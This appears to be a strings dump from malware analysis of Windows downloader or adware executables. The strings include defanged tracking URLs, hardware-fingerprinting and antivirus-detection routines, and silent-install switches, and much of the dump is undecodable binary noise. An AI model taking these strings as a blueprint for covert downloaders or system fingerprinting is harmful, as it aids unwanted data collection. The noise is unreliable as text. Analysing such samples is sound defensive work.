<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

1419052427l238l63518.exe&_upt=6ec6a9a21419053027_1812_rwx_10004000_00001000:

callback%d

MM-liao8398.exe_824:

.text
`.rdata
@.data
.rsrc
SSSSh
FtPh
tGHt.Ht&
OnBeforeNavigation: URL="%s", frame="%s", post_data=[0xX,%d bytes], headers="%s"
OnDocumentComplete: URL="%s"
OnProgressChange: progress=%d, progress_max=%d
OnNavigationComplete2: URL="%s"
OnStatusTextChange: text="%s"
OnTitleChange: text="%s"
homeUrl
downUrl
C:\Windows\Temp\temp.icon
c://temp.icon
ProExe
DownloadUrl
ErrorUrl
AdvertUrl
XieyiUrl
hXXp://tj.9158.com/Opendownloadernewxml.aspx
<4,$?7/'
(3-!0,1'8"5.*2$
DeviceIOControl IOCTL_STORAGE_QUERY_PROPERTY error = %d
**** DISK_GEOMETRY_EX for drive %d ****
Disk is%s fixed
%d ReadPhysicalDriveInNTWithZeroRights ERROR|nDeviceIoControl(%s, IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 0
**** STORAGE_DEVICE_DESCRIPTOR for drive %d ****
Vendor Id = [%s]
Product Id = [%s]
Product Revision = [%s]
Serial Number = [%s]
%d STORAGE_DEVICE_DESCRIPTOR contents for drive %d
DeviceType: x
DeviceTypeModifier: x
RemovableMedia: %d
CommandQueueing: %d
BusType: %d
%d ReadPhysicalDriveInNTWithZeroRights ERROR
CreateFile(%s) returned INVALID_HANDLE_VALUE
\\.\PhysicalDrive%d
Drive%dType
DriveÜontrollerBufferSize
DriveÜontrollerRevisionNumber
Drive%dSerialNumber
Drive%dModelNumber
Controller Buffer Size on Drive___: %s bytes
Drive Controller Revision Number__: [%s]
Drive Serial Number_______________: [%s]
Drive Model Number________________: [%s]
Drive %d -
%d ReadPhysicalDriveInNTWithAdminRights ERROR
No device found at position %d (%d)
DeviceIoControl(%d, DFP_GET_VERSION) returned 0, error is %d
%d ReadPhysicalDriveInNTUsingSmart ERROR
DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d
Error Code %d
ERROR: Could not open IDE21201.VXD file
\\.\IDE21201.VXD
ERROR: Could not SetPriorityClass, LastError: %d
\\.\Scsi%d:
Hard Drive Model Number___________: %s
Hard Drive Serial Number__________: %s
%s (%s:%d)
D:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl
softlist=%s&lmarkid=%s
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
w@C:\Windows\Temp\
%sDownLoad
_%s%s.exe
_%s.exe
/S /D=%s
%sDownLoad\%s
Browser=%s
&Resolution=%s&OS=%s&KEY=%s&Mac=%s&HardDrive=%s&CPU=%s&Graphics=%s
&Safe=%s&QQ=%s&Sougou=%s&Lmarkid=%s&Wmarkid=%s&Mtype=%s&tick=%d&flag=%s&status=%d&qqnumber=%s
&downloadtime=%d&setuptime=%d&downloadflag=%d&v=V1.9
hXXp://tj.9158.com/DownloadInsertinfo.aspx?
%ld%s%s
%d*%d
%s(%s)
...%d%c
%Program Files%
%s Inx:%d Offset:%d Len:%d
.tmp.tg
****ERR:%d,
nInx:%d, offset:%d, siz:%d
%d, lRemain
ConnectSvr:%s
X-X-X-X-X-X
SOFTWARE\%s
Microsoft Windows 95
Microsoft Windows NT 4.0
Microsoft Windows 98
Microsoft Windows Me
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003 R2
Microsoft Windows Server 2003
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2008
Microsoft Windows Vista
Microsoft Windows Server 2008 R2
Microsoft Windows 7
unknown OperatingSystem.
Web Edition
\StringFileInfo\xx\ProductVersion
\StringFileInfo\xx\ProductName
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
SOFTWARE\Microsoft\Windows NT\CurrentVersion
http\shell\open\command
%s %s
\SogouExe\SogouExe.exe
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Sogou Input
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sogou Input
%Program Files% (x86)\SogouInput\SogouExe\SogouExe.exe
%Program Files%\SogouInput\SogouExe\SogouExe.exe
M.exe
deepscan\zhudongfangyu.exe
360safe.exe
ZhuDongFangYu.exe
QQ.exe
T58web
9158web
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
HTTP/1.1
%s?log=%s&version=20140121
hXXp://tj.9158.com/logtest.aspx
:%d,server:%s, ip:%s,
:url:%s, server:%s,error msg:%s, errcode:%d
kernel32.dll
CNotSupportedException
hhctrl.ocx
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
commctrl_DragListMsg
CCmdTarget
CHttpConnection
CHttpFile
hXXp://
WININET.DLL
HTTP/1.0
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
File%d
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
ntdll.dll
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
comctl32.dll
comdlg32.dll
shell32.dll
mfcm90.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
user32.dll
ole32.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
operator
GetProcessWindowStation
USER32.DLL
F%D,3
OLEACC.dll
SHLWAPI.dll
WSOCK32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
KERNEL32.dll
GetKeyState
UnhookWindowsHookEx
SetWindowsHookExA
CreateDialogIndirectParamA
USER32.dll
GetViewportExtEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GDI32.dll
COMDLG32.dll
WINSPOOL.DRV
RegCloseKey
RegOpenKeyA
RegCreateKeyExA
RegOpenKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegEnumKeyA
ADVAPI32.dll
ShellExecuteA
ShellExecuteExA
SHELL32.dll
COMCTL32.dll
oledlg.dll
OLEAUT32.dll
GdiplusShutdown
gdiplus.dll
NETAPI32.dll
VERSION.dll
UrlUnescapeA
InternetCrackUrlA
InternetCanonicalizeUrlA
HttpQueryInfoA
HttpSendRequestA
InternetOpenUrlA
HttpOpenRequestA
WININET.dll
.?AVCCmdTarget@@
.PAVCFileException@@
.?AV?$CList@PAVCFTPTask@@AAPAV1@@@
.PAVCException@@
.?AVCFTPTask@@
.?AVCHttpService@@
.?AVCMD5Checksum@@
.PAVCObject@@
.PAVCOleException@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.PAVCUserException@@
.PAVCResourceException@@
.PAVCInternetException@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.PAVCArchiveException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.PAVCOleDispatchException@@
zcÁ
00000000000000000001
%Program Files%\MM-liao8398.exe
`R.qB
h/y%DlRZ
J!Ç
<yB*.*
yR^y.%U3
/.Ro}!
p)%sQ
CZ%SY
.vyOx
.Pm[<
42a%u
O%fWU
%cPqt
F2/%c
C7%SQ5
XU%fR
QN.Ui
IßD
(Bô|
.Qsty
.bYV`
40%sS
%%co\s
P.WGD
2Um
%U2b&0
%se7sQ
[Q.QN]
4g%x=XL$5
.Bsw&wf
uÿQ
R#.oR
45.sSC
OBW2%S2%S2
u\%Cr@
.Pd4{
[K.On
W.eQYT
gB7%U
9~ui.QBv@
J.pEu
\.MdB
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS>
accKeyboardShortcut
mscoree.dll
ekernel32.dll
KERNEL32.DLL
DownloadInstall.Document
(*.*)
Output.prn$
(*.prn)|*.prn|
(*.*)|*.*||
1, 0, 0, 1
DownloadInstall.EXE

dts.exe_1940:

.text
`.rdata
@.data
.rsrc
@.reloc
8%u3P
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
kernel32.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
RegDeleteKeyExW
E:\37WanWork\delphicode\vcLander\dts_channel\04
\Bin\lander.pdb
KERNEL32.dll
GetKeyState
USER32.dll
GDI32.dll
RegOpenKeyExW
RegCloseKey
RegCreateKeyW
RegDeleteKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegCreateKeyExW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
COMCTL32.dll
MSIMG32.dll
GdiplusShutdown
gdiplus.dll
FindFirstUrlCacheEntryW
DeleteUrlCacheEntryW
FindNextUrlCacheEntryW
FindCloseUrlCache
InternetCrackUrlW
HttpOpenRequestW
HttpAddRequestHeadersW
HttpSendRequestW
HttpQueryInfoW
WININET.dll
IPHLPAPI.DLL
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
zcÁ
.?AV?$CEventHandler@VCFormGame@@P81@AEXIIJ@ZVICWebNotifyEventHandler@@@@
.?AV?$CCWebNotifyEventHandler@VCFormGame@@P81@AEXIIJ@Z@@
.?AV?$_IDispEventLocator@$00$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventSimpleImpl@$00VCBrowserView@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$CFEvent@VCCWebNotifyEventHandler@@VFCWebNotifyEventHandler@@VICWebNotifyEventHandler@@@@
.?AVCWebNotify@@
.?AVICWebNotifyEventHandler@@
.?AV?$CEventHandler@VCFormLogin@@P81@AEXIIJ@ZVICWebNotifyEventHandler@@@@
.?AV?$CCWebNotifyEventHandler@VCFormLogin@@P81@AEXIIJ@Z@@
.?AVCFormLogin@@
.?AVCSQLabel@@
"iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:E011ECCF633711E4B7B5BF9AF9EA42F2" xmpMM:DocumentID="xmp.did:E011ECD0633711E4B7B5BF9AF9EA42F2"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E011ECCD633711E4B7B5BF9AF9EA42F2" stRef:documentID="xmp.did:E011ECCE633711E4B7B5BF9AF9EA42F2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Y
h-IjkJ}
]k%UI
*RpSshd
0v%S#
H@..ln
.GtB!
9%Up>~
GY3@%x3
-.GcU*Q
{u.YkdE
48c.lx
a,.Vx
###,,,01/222///*) 
///444*) 
,- 777---
"&" /'3=%4=
 &({{{102
$$$/--   *,-((($&&444
-(%dXTcTRdTU]SSRJJVJJNBB
$""1//)  
%/$*/&6<"-;
':!##.-/
(4" 8'4<,>E&6F *;"*AMZ
...rrredfVUW>>>'&(
3./?8=:6540/
'"!/'(/)*('#"
*-2 --')*'&*$' '&($' $()$()$()$()$()%)*')*&()$()$()$()$()$()$' &' %&*%% '&*&' %% '&*(,-*-2
K#3a$2b$4b$4b$4c#3b
 /0*./'(,#'(&' $' &' #( $()$()$()$()$()$()&()&()$()$()$()$()$()$' &' &' &&,%'('&($()) , .2
$2b#3a#3a$5`$4c$4b#3a$4b#4_#3a%5`!3b<"5b#3a$2b"5b#3a<'4b=$4b$4c<#4_
ADLADH8=@ /4,/3 03 .3 /4,/4,/4,/4,/4,/4,/4,/4,/4 .3 .3,/4,/4-05-05.16.16-04/26 .6/275:=>CF
&/# 2#&." /
'.$*/!)0!*.
(,"(/!)0
'. (/"*1!)0!)0
'."(-#)0"(- )2
'0!*. *1
(/#)0 & 
&- )- %.
&/# 2!(1 )-
!(&,3 ),
(. (/!',
( *1%.7# 2
%.SgU
(%CV)J]1Um,Pb5_v<k
(0'-4%.2
"%.Vih
&-  3"(3
"*.Udi
.Ud4cxs
!$%CTG|
%DS0Sg1Sj/Ug/Th1Th.Sg$EU
&* (/%.7
'4$.5$-6
%.Tf.Sg-Ug3Tg.Tf/Th
.AI&?I
03*3=&15
)3:&/8%.7
#/'-8)5;(.;
!)0#,6%.7
#''09(/8
%".4*4>&3;,2=&07%/6
!,49 48*3<)4<&5>)2;&/8)2;*4>&19
" $%/*)3('1$%/ ",
YdWpz:P[-9E%/9#/9 7C4DPJeoUlt$8C
#?%/<&18
.Fg%:a
.Bt;[
-.2,/-&()%&*#&*(')$()$()$()$()$()$()%)*')*&()$()$()$()$()$()$' &' %&*%% '&*&' %% '&*(,-*-2
$3a#3a#3b#3a$4b$4c$4b#3a'4b#1a#3a!2]!2]"3^"2`!4a$4b$4c<<$4b"4c$4b$4c#3a$5`
 /0*./'(,#'(&' $' &' #( $()$()$()$()$()$()&()&()$()$()$()$()$()$' &' &' &' $()%&*&' *,-,-1
$2b#3a#3a$4b<#3a$4b\\$4b\\\$4b$4b$4b$4c!4a<#3a
?EL@EH7<? /4 .2,/3--3,/4,/4,/4,/4,/4,/4,/4,/4,/4 .3,/4,/4,/4-05-05.16.16,12-04,05.1659>;AF
 .2,/-&()%&*#&*'&($()$()$()$()$()$()%)*%)*$()$()$()$()$()$' $' $' $' %% '&*&' %% '&*(,-*-2
(8g&8g)7g(8f(8g(6f&5f(5a$4b%5`K$4b"5b!3b"5b"5b&5c 6f!8f%6g$8h&7h$8h$8h&8g
(,"(- &-
&*!'.#(1#).
'. (/!',
&*!( ")2
(/"(/!*.!)0
&/ (/#).#)0
'. ),"(- (/
'0")2 (/
'. (/!)0
#* &-!*- &-
'. &-!*.
(, )-#*3
"& (/! 2 )2!)0
(, (/#,/!*.
*,!*."(-
#) ,2#(1
*2".0#,0!*-
'/!-1$,3%.7
1Th.Tf0Sg1Sj0Ri/Th
%-! 2$,3 )3
#,#-4$ 4
&/# 2".4
"ES0Tf/Th,Tg.Ud1Ug1Th%DSO
&&19$/7%/6
'&6!!/
$-#-4",3,4;"*1
.7 6>(3;-8@&19&/8&07*4;)3:
?NMhr
*$$0''3)'3$%/
YdVoy<R^)9E!09#/9*6B5GRLeoSlv$8C
( "(/#&.
!) &  *1
" !%0  /
)0!*.#)."),!'.
'. %."), (/
'.#)0 )-
 1 %. & 
#  (/ )-"(-
"'0")2!*.
.Sg2Rio
1Ug1Sj.TfH{
(/# 2$ 4
!%.Sgh
(/ *1!,0!-3
)3&-6 )-*,6
# $-1")2
",$.5$/7
%1%-4#*3#,5
'%CTs
.Sg0Sg.SgF{
'1".4
1?,Tg-Ug1Ug}
&$0:'09&07
!##1&'5! 0
-"#1(%4 .
$2",3%.7(1:'09 )2'09'09
1@$,3%/6$19.5>$,3(4:
%,&07
!6LW.DP
$$19'09&/8&/8*3< 4=*3<*3<*3<
&#.2*6<'0:*3<)4<'4<%/6
(2'4<*3=
")(4:*6<$19$/7
!,"".*(4)(2&%/ ",
&- )- (/ ),
' !&/"(-
'.!',!$,
(/#)0!)0 (/"(- *1
(, (/#)."(-
(/ (/!*3 ),
'.!)0 (/#(1 )- &-
(, '0 &-!'.
(/ %. )-
&* (/ )-
*.#,0")2!)0
'0 '0" /
.Sg/Ug0Sg2Sg-Uhi
-b}#:P
","(/"*1# 2"(/
)0".2!*3
#(%DSa
)1 )2 $)
% #.6 & 
"," /" 4
'0&,9&/3
.SgAp
$#/5'.7&28
1Sj.Tf.Tf0Tf
#/!)0&07'18$,3
$!.6)4<(5=&3;*5=&/8(4:*6<# 2
MPOhr
 #$. *4&'1$%/!#-
&- &  '0
*. )- &-
%)!&/!,0"(/!(1!)0!*.
'  (/!*.!*.
)-"(- &-
)0 )-"*1
'.!'.!*.
&- &-!'.
&-$*1$)2
(, (/ '0
##DS.Sgx
 ! 5$-1!*.
%-# 2"*1
&0$-7'.7
'0  /$)2
3Tg/Ve/Tj1Th.Sg/Scn
# !,4!'.
 Uh2Sf-Rf/Ug.Tf
*Tg.Vi0SgQ
.Tf1Ug0Tf?o
 5'.7&07 (/
#" 4 .4&07
%.)4<'09&19" 4
!"CV0Tf0Tf.Tf.Tf.Tf.Tf0Tf/Ve%CT
&-")2)3:)5?'.7
 ##/'*2&)1$%/
!( (/ (/
&-!)0 (/ (/
")!)0# 2
&-!)0!)0
$  (/!)0# 2
'."*1!)0"*1!)0!)0
'. (/!)0 (/
'. (/ (/"*1 (/
%, (/ (/
'.!)0 (/
'."*1 (/
&-!)0 (/!)0
'. (/!)0 (/!)0
'."*1"*1
'. (/ (/!)0 (/
&-!)0!)0!)0 (/ (/!)0
%,"*1 (/
'."*1 (/!)0
(/!)0"*1
'. (/ (/
%,!)0 (/# 2"*1!)0
'.# 2 (/ (/
'.# 2!)0 (/%-4 (/ (/# 2
'.%-4 (/!)0 (/"*1 (/# 2"*1
&- (/!)0"*1$,3!)0 (/"*1
'.!)0 (/ (/"*1# 2
%,# 2!)0 (/ (/ (/
'. (/$,3!)0
%,!)0$,3 (/ (/ (/"*1!)0
&-!)0# 2 (/
'. (/!)0!)0!)0 (/!)0 (/
'.!)0!)0
%, (/!)0"*1 (/"*1!)0$,3
&- (/!)0
%,$,3"*1"*1
$ !)0 (/
&-"*1"*1 (/ (/$,3 (/
&-!)0!)0"*1
'. (/# 2"*1
&- (/$,3"*1
'.!)0"*1# 2!)0$,3 (/# 2 (/"*1"*1%-4"*1 (/!)0 (/!)0"*1"*1$,3$,3
'."*1 (/%-4"*1 (/# 2# 2"*1 (/
'.# 2$,3
&-# 2# 2# 2
'. (/$,3 (/# 2%-4"*1!)0# 2# 2 (/ (/"*1# 2# 2
(07# 2$,3$,3%-4# 2"*1"*1$,3# 2"*1%-4# 2
&-$,3!)0$,3# 2!)0$,3 (/$,3 (/"*1# 2$,3
'. (/# 2"*1%-4
'.&.5'/6$,3"*1# 2$,3%.7
'.%-4 (/"*1# 2%-4 (/
'.# 2# 2$,3 (/!)0
$.5#-4#-4",3#-4#-4%/6%/6 (/&.5$,3!)0%-4"*1# 2'/6 (/&.5
'.&.5$,3"*1$,3 (/# 2'/6!)0
'.%-4$,3"*1'/6&.5 (/&.5#,5
(/#-4%/6",3
)./,./%)*"%)$' &' $',&()&' $' $' $' $' $' $' &' &' '(,$()$' $' $' $' $' &()$' #&*"'** /(-.
,A~-C}
0[!0^ 1\
 /0-,0(* $%)&' &()$' %&*$()$()$()$()$()$()&()&()$()$()$()$' $' $' &' &' $' (' $&'$',*,- /0
-C}-B
 C}.B| A{)?y(@v&;r$7p#8l 7o%;o#8l$8o#7p$9m&7p%9r*>x*?|-A{-C}/C}-C}-C}-C}
0[ 0^ 1\ 0[
&-"'0 )-
(,!', (/
'. &-$*1
@R*Vg/br*Yg(Yg.cp-^n!I[
(,$*1 & 
&- &- )-
!2 DT.br
&/% 0!',
(2"*1!( 
'. &-!*-"(/
'. )- )-"*1
(/#*-"(/ *1
(, ),"(/
'.&,3!)0
#&#*3!)0
(0!*.$)2 '0
%4  3%.7#,0
 1$.5&-6
*2"(3 *1
&*"(/&/8
,4$-7%-4
'%9 )<*(;# /
#3#08)3=%/9
&4:&/8(/8
)6$06)4<(07
!*-#,5'.7
#('0:%.7
#!/5)4<(4:)2;'18)/6
",3&19)5;)3=(4:)5?)2;&/8)2;*4>)18 0<
#/A*.AOMaxs
B^i#)<(0A58G?>N;<J69H14C$ <.APm
*/0 -.&* #&*$()%'($',&()&' $' $' $' $' $' $' &' &' '(,$()$' $' $' $' $' &()$' #&*"'** /(-.
,B|-C}-C}.B|,B|-@})?y);v&;o 5h
.B|,B|.B|-C}-C}-C}
0[ 1\ /]
 /0-,0(* $%)&' &()$' %&*$()$()$()$()$()$()&()&()$()$()$()$' $' $' &' &' $' &()#&*#&** / /0
.A~-C}.B|.B|/C},A~,A~-B
-C}-C},A~.A~-B
/^ 0_ 0_
/^ 0_ /`
AFI@CG8;? /4 03*/2,12 .2,/3,/3,/3,/3,/3,/3,/3,/3 .2,/3,/3,/3-04-04.15.15.16-25,/711759:=BE
-.2 0.&()%% "'**((#&*$()$()$()$()$()$()'))&(($)($)($()$()$()&' %&*%&*%$-'% &(($#,(' (,-),0
-C}*=z%9p"6m 1i
/^ 0_ .^
!(#)0# 2
'.!'."& 
&-"(/ (/!'.
'- &-#)0
&/ &- '*
ET.bs
%* (/$(3!'. *1
&(!'."*1!)0!)0!*.!*. ), (/
'.!', (/
)- )-"*1"(-
$  (/ )-#(1
*.!(1!( 
%. )- # 
'."(-!*4
&*!', (/"(-
'!)0# 2! 2!)0
%,!',#,5
!(1 )- (/
(, (/&,1
(/"*1!*.
'0!*4 )2 & ! 2
&2!-3%.2!*3 (/
~^
(4"*1 ),'-4
*3!-3",3&-6
)5! 2",3!*3
(4#-4&19$ 4
*5! 5",3
%D`q@_n
$2$19&/8$-6
)5$.5! 2*4;# 2
#2#1= 6>(3;-8@&19&/8%/6*4;)3:
*,!',%*3
&- (/ (/
?Q%Vf.do(Yg'[g-aq _l K\
&* &  (/
))!'.#).
&/ (/"*1!)0
'.!*.!',
)-!(1 (/
&/!'. )-
)-! 2 ,.
#/!,4 (/!*.#(1 )2
)/ *1$*1
)0%,5%*3
 4"*1 $)
'5$.8!',
)4! 2" /
)5"/7'-8
$2!18%.7#17
)6 *1&07*29$,3
#* &- & 
#0$0:*5=*5=(3;*5=)3: 5<! 2
&*!'. (/
AP(Vg.br'[h&Zg*cr ^n KZ
'  )-!*.
'.! 2 &-
(, )2!( " /
'.$*/!*.#).
(1 &- ),!*. (/
(, (/" /
$-"(/"(-% 2
(,!)0 &-
)0!$,!*4"(- (/ (/
'0!-3 )- (/
(/$)2  /
%8S/TvS
&2#/5#,5
(,! 2 *1
(5$-6&-6
*7 *1! 2
(0".4!'.
/6%-:'/6 )-
 )<,'< .
/6#-4
 7'4< 09#3:",3
"''0:&3;
 5 -5 4=(/8&/8$-6%/6*4;)5;)6>)2;.7@'18'.7%.7)3=)3=" /
&-!*3)48)6>%.7!09
)3!(1" /!(1#)0
'  ),!)0!'.#',
&/!'.!*.!( 
(,! 2 )-
%, (/"(/
)-!)0 *1
&* &  %.
%.!(1 &-
'.!'.!*. $)
"(/  3!*.
$0!*4" /
/.Tv3_
)Ec%C`4a
%1!(1" 5
)1! 2".0
,4 )-")2$*1"-1
 8$-7 )-#.6
)1! 2" /
5Nb.CX
'4'-8
*5#/5$)2".2
 7$.5".2
%0%1;'0:$06
,8#-4%.7(1:'09 )2'09(1:
%,&07$19
#1'3='09&/8&/8*3< 4=*3<*3<*3<
#"-5'3=&/9'18)5;'4<(2<#.6
(/)5;)5;
!((4:*6<$19
2>84DT

.IJHEGG
'45CV3B\.Ad5EV8JK1'4*
-,.IDA}ru
%%%., .,,., &(((&&244
---333555222)(*
,)%dXTaTRbTU]SSPKJVJJNBB
 -.CAABBB031
34CFD"
]^\8;?*- 673[_`
3-.?9::56510
@;< ))    '%%#"$
755524/* ,*) '&)''"!#&%')$%$"!&"!
(((533-*, &(-  -)(0 *)$%#"$&%' '&(%!
%%f6644*'),').) ("#)#$'#"&$#-(' ##)%$$""
!977,,,!
 &'2006120 ,3.-/*) &'%"$
!$!# &',(')$#*%$)%$!
.*))''.,,1-,,'&2,-2-,&$#&$$$
$(')$""$
($# ))%## &%'"!
$$$--- ))
'%%*%$/*).)(*&%($#%##!
'"!.*))$#(#"($#"
222888999%%%
(#"($#%! *%$'"# '#"&"!'#"$
&! ,%"&! &"!&!
$$$;;;777755
&! *&%%##
)$#)%$'"#)#$$
444;;;./-
4#",./-   
8)*./.0...*,,0/1)'&
###)))   %%%
111???|||
8!"0&)' "#(')142:<=77701;
'-//:88111--- *,...46@
;;;;8=<'&(
"/20;;;:56689
*%&4$$2/19031''' ###
###%%%"""
 (*&#%$""
555879  9
!453666,- 
)));;;7770/1&&&231
&%'89786687;:<<., 
?@>===946
;<:333555()'
"""###$$$'''
!)(*<;=,,,/0.9:8555000)))
342*** !ÌC###555JJJ "#"#!GHFAAA?>@MMM;;;GFHIGGKIIB@@A>@$&&&&&CCCADBAAA.4/
???111222
!!!#%%$$$
---)))///***)))
<<<///%%%^^^
AAACDB   )))---UUUPPP>>>'(&RRRWUUMKKTRRKIH)*(---VVVBC?GFHSSS()'IHJCDB&&&(')FGEIKLOOO ,*422:::657,*)'%24333=;;EBD031-,.GEEGGG888>?=CBDFGEDHC*) $""BBBGIJ,,,888III!" 111BBBKKKHIG675%%%'&(===;<:::::::'''
"""000   
111nnnUUUqqq___YYY}}}KKKYYYYYYNNN:::\\\ZZZ:::bbb333888ddd222aaa^^^[[[XXXBBBTTTRRRJJJLLLWWWfffmmm...\\\___GGG///---444222111ccc```bbbYYY___...VVVZZZ...@@@LLLRRREEEOOOWWWYYYJJJUUUEEEKKKHHHNNN???777444III>>>CCC''' 555---888***$$$///)))!!!
***:61'(&
006)*.015
&&&222./-
) 3..4015
---;;;777
/19#$(134
1178:;/11
...QQQJJJ
&&&...FFFFFF
51,333[[[
[[[(((###
!!!"""***
   %%%###%"$
'#%%#%%'$&
   )*&#$"
&%'%&$%$&$$$
$$$!!!,,,%%%
"""!!!$$$,,,''')))333
311$%#.)*1//
 /---0.%##000----0.
''',..*) $&&586', 
!!!,,,&&&---$$$%%%...
333***((($$$!$"746435---
222444435754&&&
!"-  ''3
-134540333
%&"79:=:<
"!#=;:>9;$)(
1,**435968594:>?<>>20/$&&
###)))---###111...888   ...000***$$$"""
###888777>>>
%##122>--;
"! 4449:8
7$&1'&('(&
666897#%&#"2
<<<### !!!
!!!   :::???777
!"6;:;99'&( !
999 (')>?=13376@
<<<:::111
...999555<<<111
;;;888???435$""
0/27#"$%''977 #1
.00><<857$""
"#! !%$""!!!(((,**
???;;;===666;;;"""
%%ÌC===III
675><<4539;<435
000,(-!" 333
*(';;; '$&===<;=;99
635><<666
444>>>$#%
$$$;=>?>@9:89:8(')
555<;==;;<<<466;8:=9>
%&$KJLCCCEEEOOO895%&$#"$ ,*(%'$#ÝD%%%'%$"""$!#!$"<?=NNN111142HJJGFH
!!"#!NKMLJJLLL;==?@>GEE%%%LLLFDCEEE-,.JHHJKI* )$$$$%#%$&444$$$(&&!" 768FFF&'%"""CBD453<<<435'''===:9;555(((&&&HHH;:<
444NNNHHHCCCCCC???000777:::666>>>GGGOOOVVV---///SSSYYYIII???SSSMMM444***NNNIII///111555,,,...XXX[[[VVVVVVXXX444YYYZZZOOOaaaVVVHHH<<<LLL000___\\\(((LLL^^^[[[QQQ;;;???>>>TTTRRREEE000VVV---LLLYYYRRROOORRR   YYYSSSQQQNNN???...ZZZ111000NNN<<<]]]<<<---:::___SSS
fffFFFHHHNNNNNNSSSNNNSSS:::LLL^^^HHHVVV333---XXXVVVWWW[[[ddd===@@@OOOHHHQQQ111OOOlllZZZUUUEEE^^^fffaaaUUU]]]aaaaaaSSSaaaccc]]]ZZZIII;;;555XXXfff444dddWWWbbb^^^AAA///...222555999XXXiii...QQQbbbNNN>>>NNNXXXFFFAAA]]]]]]sss]]]:::eee...QQQYYYTTT```FFFHHHLLL
